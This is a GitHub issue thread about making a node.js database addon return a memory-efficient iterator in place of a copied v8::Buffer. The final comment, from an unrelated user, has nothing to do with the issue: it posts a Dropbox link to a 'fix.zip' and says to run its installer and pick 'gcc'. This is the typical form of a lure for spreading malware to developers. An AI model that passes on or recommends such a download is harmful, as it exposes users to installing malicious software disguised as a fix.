### ISSUE TITLE
Iterator with node.js addon

### ISSUE THREAD

**Issue by nesterow** [nesterow/dal#1]
**The issue**
Some queries can return gigs of data. The standalone server handles them efficienly, however node.js addon has a flaw in its implementation. Currently node.js addon returns a copy of v8::Buffer which is not a memory efficient approach. I want to enable node.js addon as a full-feature embedded solution.

**Possible solutions**
For C++ binding, I need to investigate a possibility to return an object that implemets javascript's iterator interface. The Go's database interface already provides Next() and Scan() methods, so there's definetely a way to use it with CGO.

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
